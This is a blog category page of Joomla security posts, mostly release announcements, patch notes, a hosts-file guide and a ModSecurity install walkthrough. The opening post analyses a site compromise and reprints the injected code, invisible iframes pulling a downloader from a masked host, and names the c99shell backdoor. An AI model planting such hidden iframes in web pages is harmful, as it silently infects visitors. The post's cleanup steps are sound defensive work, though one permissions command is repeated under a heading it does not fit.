security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization. [read more at http://en.wikipedia.org/wiki/Security]

  •  Everything has started with an email

    Trojan-Downloader.VBS.Agent&8206;
    From: Enrique MONTECRISTO (This email address is being protected from spambots. You need JavaScript enabled to view it.)
    Sent: Mon 6/18/07 10:04 PM
    To: This email address is being protected from spambots. You need JavaScript enabled to view it.
       
    Hello Cedric,
    When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield :
    http://www.gdata.de/trade/GB/productview/727/16
    ---------------------------
    Virus: Trojan-Downloader.VBS.Agent.u
    Adress: stat1count.net
    ----------------------------
    Virus: Trojan-Downloader.JS.Agent.fq
    Address: stat1count.net
    ----------------------------
    Is it a fake ?

    The "virus" Trojan-Downloader.JS. seems like a malicious javascript inline somewhere in my homepage
    Thanks to Firefox WebDeveloper toolbar, it was quite easy to locate the malicious script (View all javascript)

    The Hacker was inserting 2 strange line in my content. He has tampered:


    index.php
    // displays queries performed for page
    if ($mosConfig_debug) {
        echo $database->_ticker . ' queries executed';
        echo '<pre>';
        foreach ($database->_log as $k=>$sql) {
            echo $k+1 . "\n" . $sql . '<hr />';
        }
        echo '</pre>';
    }
    doGzip();
    ?>

    <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

    AND /index2.php

    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                <?php echo $mainframe->getHead(); ?>
                <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
                <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
                <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
                <meta name="robots" content="noindex, nofollow" />
                <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
                <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
                <?php } ?>
            </head>
            <body class="contentpane">
               <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
                <?php mosMainBody(); ?>
            </body>
        </html>
        <?php


    Which got replace at runtime with
    http://xxx.info/stds/pages/default.php
    http://xxxxxxx.info/c/2380/counter21.php    

    xxxxx.info  I dont want to make publicity to this hacker by publishing his server url here

    How to find all place potentialy infected?

    return a list of all files with path (-H) that contains the substring xxxxx

    # find . -type f  -exec grep -H xxxxx {} \;

    How did I get infected?

    It seems that the hacker has use my demo site at demo.waltercedric.com to copy an image on the server or replace an existing one which was having bad user rights
    It may be an image like this one runme.php.jpg  this image then bootstrap and load a hacker tool c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c)

    PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell-A listens for commands from a remote user.

    How to avoid that next time

    No file in apache root must have more than r--r--r-- rights so here is a small scripts that you can crontab or save for periodically check. It automatically change all files to read only for all, group and other

    # find . -type f -perm 600 -exec chmod ago=r {} \;


    Joomla! is automating during file save the CHMOD, but not on all files in the structure.

    Avoid any files with setguid in your apache root
    # find . -type f -perm 600 -exec chmod ago=r {} \;

    Note:


  • hosts.file The hosts file is a computer file used by an operating system to map hostnames to IP addresses. This method is one of several methods used by an operating system to locate network nodes on a computer network. Spybot Search and Destroy is using this technique when you click on immunize button behind the scene.

    Found at http://someonewhocares.org/hosts/

    Use this file to prevent your computer from connecting to selected internet hosts. This is an easy and effective way to

    • protect you from many types of spyware,
    • reduces bandwidth use,
    • blocks certain pop-up traps,
    • prevents user tracking by way of "web bugs" embedded in spam,
    • provides partial protection to IE from certain web-based exploits
    • blocks most advertising you would otherwise be subjected to on the internet.

    There is a version of this file that uses 0.0.0.0 instead of 127.0.0.1 available at http://someonewhocares.org/hosts/zero/. On some machines this may run minutely faster, however the zero version may not be compatible with all systems.

    This file must be saved as a text file with no extension. (This means it that the file name should be exactly as below, without a ".txt" appended.). Let me repeat, the file should be named "hosts" NOT "hosts.txt".

    For Windows 9x and ME

    place this file at "C:\Windows\hosts"

    For NT, Win2K and XP

    use "C:\windows\system32\drivers\etc\hosts" or "C:\winnt\system32\drivers\etc\hosts"

    For Linux, Unix, or OS X place this file at "/etc/hosts". You will require root access to do this. Saving this file to "~/hosts" will allow you to run something like "sudo cp ~/hosts /etc/hosts".

    Ubuntu

    Users who experience trouble with apt-get should consult http://ubuntuforums.org/archive/index.php/t-613521.html

    OS/2

    Copy the file to "%ETC%\HOSTS" and in the CONFIG.SYS file, ensure that the line "SET USE_HOSTS_FIRST=1" is included.

    BeOS / Zeta / Haiku

    Place it at "/boot/beos/etc/hosts"

    Netware system

    The location is System\etc\hosts"

    For Macintosh (pre OS X)

    Place it in the Mac System Folder or Preferences folder and reboot. (something like HD:System Folder:Preferences:Hosts)

    Alternatively you can save it elsewhere on your machine, then go to the TCP/IP control panel and click on "Select hosts file" to read it in.As well, note that the format is different on old macs, soplease visit http://someonewhocares.org/hosts/mac/ for mac format

    If there is a domain name you would rather never see, simply add a line that reads "127.0.0.1 machine.domain.tld". This will have the effect of redirecting any requests to that host to your own computer. For example this will prevent your browser from downloading banner ads, or sendingyour information back to a company.

  • ModSecurityTM is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks. from http://www.modsecurity.org/

    You'll have to create a free account at https://bsn.breach.com to get the real link

    # cd
    # wget https://bsn.breach.com/downloads/t=5156aa8803d6f186cf38688be522a402/modsecurity-apache/modsecurity-apache_2.5.7.tar.gz
    # tar -zxfv modsecurity-apache_2.5.7.tar.gz
    # cd modsecurity-apache_2.5.7/apache2
    # ./configure
    # make

    Copy the library mod_security2.so to /usr/lib/apache2&160;

    # cp /root/modsecurity-apache_2.5.7/apache2/.libs/mod_security2.so /usr/lib/apache2/mod_security2.so&160;&160;

    Then copy all latest rules into apache2/conf.d folder

    # cp -r /root/modsecurity-apache_2.5.7/rules/etc/apache2/conf.d/

    Copy the minimal configuration file into apache2/conf.d folder

    # cp /root/modsecurity-apache_2.5.7/modsecurity.conf-minimal /etc/apache2/conf.d/modsecurity2.conf

    Add this line at the top of modsecurity2.conf

    LoadModule security2_module /usr/lib/apache2/mod_security2.so

    Restart apache2 by executing

    # rcapache2 restart

    Verify proper operations by looking at log files

    # tail -f /var/log/apache2/modsec_debug_log

    Attention this is my location for log files!

    Change

    • audit log location line 191
    • debug log location line 285

    in /etc/apache2/conf.d/rules/modsecurity_crs_10_config.conf

  • Just in case I take too much time to deliver a ready to use download, duration 5 minutes, but you need to understand basic php coding

    1. Create a temporary directory c:\patch
    2. Copy an existing patch distribution, under a new name
      For example, lets download Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip into c:\patch\ and copy it to c:\patch\Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    3. Download the latest full zip package of Joomla that target the patch (here 1.5.14), so I download Joomla_1.5.14-Stable-Full_Package.zipand save it in the same directory c:\patch\
      patches.for.securityimages.howto
    4. Now download a free trial copy of Beyond compare from www.scootersoftware.com and install this great application
    5. Select the 2 zip files, and right click “compare”
      patches.for.securityimages.howto.1
    6. Now it is like a game, on the left side, you have you patch that need to be updated with the latest Joomla! core changes, just edit every file present on the left and update line that are new or changed till you are finished. Luckily there is only 14 files to merge
      patches.for.securityimages.howto.2
    7. Test the result in a Joomla test instance.

    I do this for you at each release of Joomla!

  • Anybody using internet should really read this article. While targeted at windows users, most of the
    rules also apply to users of Linux and mac.

    "Security consultant Howard Fosdick has contributed the latest entry in the
    2008 OSNews Article Contest: a highly detailed examination of security and privacy on the
    Windows platform, and how to use free
    software tools and a little knowledge to protect your privacy online.
    Do you know that --

    • Windows secretly records all the web sites you've ever visited?
    • After you delete your Outlook emails and empty the Waste Basket, someone could still
      read your email?
    • After you delete a file and empty the Recycle Bin, the file still exists?
    • Your computer might run software that spies on you?
    • Your computer might be a bot , a slave computer waiting to perform tasks assigned
      by a remote master?
    • The web sites you visit might be able to compile a complete dossier of your online activities?
    • Microsoft Word and Excel documents contain secret keys that uniquely identify you? They also
      collect statistics telling anyone how long you spent working on them and when. "
  • An interesting articles which also explain You how to empower the queries capacities of Google serach engine. Note that Google has nothig to do with this security breach, their search engine is simply too efficient and users not enough clever to store all sensitive data in a cryptographical container like PGPdrive, or TrueCrypt.

    Google is in many ways the most useful tool available to the bad guys, and the most dangerous Web site on the Internet for many, many thousands of individuals and organizations. Read more at SecurityFocus

    Google has been and will always be a valuable tool in my daily work as It allow me to resolve a lot of developer problem in no time...

  •  

    Joomla! 1.0.9 is now available at www.joomla.org

    It is strongly recommended to upgrade to this version.  1.0.9 contains the following changes:

    • 12 Low Level Security Fixes
    • 160+ General bug fixes
    • Several Performance enhancements
    And onebusiness day after (Ive done my homework), I release:

    Joomla 1.0.9 support for SecurityImages
    these files are from the 1.0.9 distributions plus all changes required to support securityimages in

    • com_contact  "The contact Us section"
    • com_login for the login module
    • com_registration  all registration functions
    Please Note:
    1. this is a FTP patch!
    2. There is now way to deactivate securityimages in com_contact (other than deactivating securityimages sitewide) 

    Do yourself a favor use the latest securityimages version 3.0.5 :-)
    Files are available at Joomla forge in file release and at www.waltercedric.com

  • Joomla Logo Vert Color

    From Joomla.org

    The Joomla Project announces the immediate availability of Joomla 1.5.10 [Wohmamni]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 66 bug fixes, one low-level security fix, and one moderate-level security fix. It has been 11 weeks since
    Joomla 1.5.9 was released on January 10, 2009. TheDevelopment Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Click here to download Joomla 1.5.10 (Full package) »
    Click here to find an update package. »

    Statistics for the 1.5.10 release period:

    • Joomla 1.5.10 contains:
      • 68 issues fixed in SVN
      • 281 commits
    • Tracker activity resulted in a net decrease of 8 active issues:
      • 176 new reports
      • 133 closed
      • 68 fixed in SVN
    • At the time the 1.5.10 release was packaged, the tracker had 95 active issues:
      • 44 open
      • 40 confirmed
      • 11 pending
  • joomla.logo The Joomla Project announces the immediate availability of Joomla 1.5.11 [Vea]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 26 bug fixes, two moderate-level security fixes and one low-level security fix. It has been 11 weeks since Joomla 1.5.10 was released on March 28, 2009. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Click here to download Joomla 1.5.11 (Full package) »
    Click here to find an update package. »

    Official post at www.joomla.org

    Patches for SecurityImages 5.x will follow in 20 minutes from now!

  • f_1218589627

    The Joomla Project announces the immediate availability of Joomla 1.5.13 [Wojmamni ama baji]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 26 bug fixes, two moderate-level security fixes and one low-level security fix. It has been 3 weeks since Joomla 1.5.12 was released on July 1, 2009. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Statistics

    Statistics for the 1.5.13 release period:

    • Joomla 1.5.13 contains:
      • 7 issues fixed in SVN
      • 7 commits
    • Tracker activity resulted in a net increase of 42 active issues:
      • 68 new reports
      • 19 closed
      • 7 fixed in SVN
    • At the time the 1.5.13 release was packaged, the tracker had 188 active issues:
      • 89 open
      • 68 confirmed
      • 31 pending

    Read more HERE

  • f_1218589627_thumb The Joomla Project announces the immediate availability of Joomla 1.5.14 [Wojmamni ama naiki]. This release contains fixes for two material bugs that were introduced in version 1.5.13 and one low level security issue. Instead of waiting for a normal 6 to 8-week release cycle, this release is being made available to users now. It has been eight days since Joomla 1.5.13 was released on July 22, 2009.

    Statistics for the 1.5.14 release period:

    • Joomla 1.5.14 contains:
      • 2 issues fixed in SVN
      • 2 commits
    • Tracker activity resulted in a net increase of 14 active issues:
      • 28 new reports
      • 12 closed
      • 2 fixed in SVN
    • At the time the 1.5.14 release was packaged, the tracker had 202 active issues:
      • 99 open
      • 68 confirmed
      • 35 pending

    http://www.joomla.org/announcements/release-news/5244-joomla-1514-released.html

  • The Joomla Project announces the immediate availability of Joomla 1.5.15 [Wojmamni ama mamni]. It has been three months since Joomla 1.5.14 was released on July 30, 2009.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    Click here to download Joomla 1.5.15 (Full package) »
    Click here to find an update package. »
  • The Joomla Project announces the immediate availability of Joomla 1.5.9 [Vatani]. This is a security release and users are strongly encouraged to upgrade immediately.
    It has been around two months since Joomla 1.5.8 was released on November 10, 2008. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Announcement and download here

    Unnoficial Mirror download here

    Statistics for the 1.5.9 release period:

    • Joomla 1.5.9 contains:
      • 81 issues fixed in SVN
      • 55 commits
    • Tracker activity resulted in a net decrease of 1 active issue:
      • 169 new reports
      • 92 closed
      • 81 fixed in SVN
    • At the time the 1.5.9 release was packaged, the tracker had 113 active issues:
      • 63 open
      • 47 confirmed
      • 3 pending
  • joomla_1_7_support

    I will be fully supporting Joomla! 1.7 and hopefully be also able to migrate my whole site away from 1.5 to 1.6 to 1.7 in a row in the next coming weeks (10 July - Joomla 1.7 GA released)

    I will in the coming days test all my extension against 1.7 and set up a demo site at http://demo-joomla-1.7.waltercedric.com/

    Note: I always recommend to all users asking for support to move away from Joomla! 1.0 and to use the latest versions of Joomla!

    Do not wait, invest regularly time to update your Joomla!  instead of migrating every 2 years..

    Do not alter the core file of Joomla! updates will be a real pain then!

    Ask in Joomla! forums for help: there are ways of changing Joomla! behaviors without changing code by using extensions.

  • joomla_download_banner joomla_donate_banner

    The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.10

    Since Joomla 1.5.10 is released...Here are the new patches for SecurityImages 5.1.1

    • Allow login views, login modules, register, lost password, lost user account and contact section to be
      protected by SecurityImages
    • Are for Joomla! 1.5.10 only and SecurityImages 5.1.0 or later
    • 14 files has been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.10-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages

    DOWNLOAD HERE and stay up to date with the Joomla! 1.5 patches RSS feed&160;Feed Icon

  • Only for SecurityImages 5.1.x and Joomla! 1.5.14

    Allow login views, login modules, register, lost password, lost user account and contact section to be
    protected by SecurityImages

    • Are for Joomla! 1.5.14 only and SecurityImages 5.1.x or later
    • 14 files has been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages.
  • Only for SecurityImages 5.1.x and Joomla! 1.5.15

    Allow login views, login modules, register, lost password, lost user account and contact section to be
    protected by SecurityImages&160;

    • Are for Joomla! 1.5.15 only and SecurityImages 5.1.x or later
    • 14 files has been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.15-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages.
  • Joomla! 1.0.5 is now available on the forge for download here. This is a Bug and Security Release, which means it contains fixes for Security Vulnerabilities. It is highly recommend that you upgrade to this version.
  • ImageJoomla! 1.0.8 [ Sunshade ] is now available as of Sunday 26th February 2006 07:00 UTC for download here.

    We Highly Recommend that you upgrade to this version. 

    1.0.8 contains the following work:

    • 37 Security Fixes
    • 70+ General bug fixes
    • Several Performance enhancements

    1.0.8 is available as a Full Package, which contains all Joomla! files and Patch Packages which contain only the files that have been changed by the Stability work conducted.

  • joomla

    The Joomla Project is pleased to announce the immediate availability of Joomla 1.5.12 [Wojmamni Ama Woi]. This release contains a number of bug fixes and three moderate-level security fixes. It has been less than a month since Joomla 1.5.11 was released on June 3, 2009.

    This release marks an important milestone for the Joomla Project due to the upgrade of the PEAR library to the new BSD licensed version, which brings the codebase into full compliance with the GPL. In addition, this release contains an important upgrade to TinyMCE v 3.2.4.1.

    Statistics for the 1.5.12 release period:

    • Joomla 1.5.12 contains:
      • 25 issues fixed in SVN
      • 14 commits
    • Tracker activity resulted in a net decrease of 11 active issues:
      • 54 new reports
      • 74 closed
      • 25 fixed in SVN
    • At the time the 1.5.12 release was packaged, the tracker had 146 active issues:
      • 59 open
      • 60 confirmed
      • 27 pending
    Download

    NOTE:&160; My personal mirror is also up to date

  • Joomla_Logo 

    The Joomla Project announces the immediate availability of Joomla 1.5.16 [Wojmamni ama busani]. It has been about six months since Joomla 1.5.15 was released on November 4, 2009.

    IMPORTANT NOTE: There is a problem in the upgrade packages for version 1.5.16. Until this can be fixed, please upgrade using the full package file above. You can follow the same instructions as for the upgrade packages. Just use the full file instead of the version file. They will correct this situation as soon as possible.

    Statistics for the 1.5.16 release period:

    • Joomla 1.5.16 contains:
      • 48 issues fixed in SVN
      • 52 commits
    • Tracker activity resulted in a net increase of 83 active issues:
      • 224 new reports
      • 94 closed
      • 48 fixed in SVN
    • At the time the 1.5.16 release was packaged, the tracker had 303 active issues:
      • 169 open
      • 103 confirmed
      • 31 pending
  • The Joomla Project announces the immediate availability of Joomla 1.5.20 [senu takaa]. This is a security release that addresses issues with the Joomla 1.5.19 packages.  We recommend users upgrade immediately.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    Or from my personal http://mirror.waltercedric.com

  • Joomla_Logo

    From the official press release

    The Joomla Project announces the immediate availability of Joomla 1.5.22 [senu takaa ama woi]. This is a security release, and we recommend users upgrade immediately.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    You can also download these files from my Unofficial Miror of Joomla! files (nearly 1000 files with all versions of all Joomla! are available)

    http://mirror.waltercedric.com

  • PhotoFEED is a small content plugin for Joomla! 1.5 that allow you to inline a set of images from your favorite online gallery: Smugmug, Flickr, Picasa or any RSS feed in any article.

    You can see it running here in my Demo site.

    New version 1.5.0 is available!

    photofeed.joomla.1.5_thumb3

    NEW:  use /media directory for resources
    NEW:  online documentation in administrator panel
    NEW:  plugin log data in debug mode at /logs/plg.photofeed.log.php you cant point a browser to it, use FTP/SCP/Plesk/Cpanel to read this file.
    NEW: demo mode

    Download PhotoFeed

    photofeed

     

     

    Documentation

    wiki_icon

    Use the forums for support, questions or submitting your ideas

    forums_icon

  • http://www.securitypatterns.org/index.html